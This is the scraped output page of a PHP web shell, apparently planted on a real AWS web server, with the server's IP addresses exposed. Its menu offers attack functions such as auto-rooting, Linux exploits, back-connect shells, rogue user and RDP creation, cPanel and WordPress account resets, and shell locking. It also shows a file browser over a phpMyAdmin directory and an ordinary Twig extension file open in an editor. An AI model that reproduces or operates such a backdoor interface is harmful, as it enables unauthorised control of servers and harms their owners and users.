Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.21.55.178
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
src /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetExtension.php
953
B
-rw-r--r--
CoreExtension.php
488
B
-rw-r--r--
FlashMessagesExtension.php
389
B
-rw-r--r--
I18nExtension.php
680
B
-rw-r--r--
MessageExtension.php
1010
B
-rw-r--r--
SanitizeExtension.php
935
B
-rw-r--r--
TransformationsExtension.php
722
B
-rw-r--r--
UrlExtension.php
1.16
KB
-rw-r--r--
UtilExtension.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UrlExtension.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Twig; use PhpMyAdmin\Url; use Twig\Extension\AbstractExtension; use Twig\TwigFunction; class UrlExtension extends AbstractExtension { /** * Returns a list of functions to add to the existing list. * * @return TwigFunction[] */ public function getFunctions(): array { return [ new TwigFunction( 'get_hidden_inputs', Url::getHiddenInputs(...), ['is_safe' => ['html']], ), new TwigFunction( 'get_hidden_fields', Url::getHiddenFields(...), ['is_safe' => ['html']], ), new TwigFunction( 'get_common', Url::getCommon(...), ['is_safe' => ['html']], ), new TwigFunction( 'get_common_raw', Url::getCommonRaw(...), ['is_safe' => ['html']], ), new TwigFunction( 'url', Url::getFromRoute(...), ['is_safe' => ['html']], ), ]; } }
Close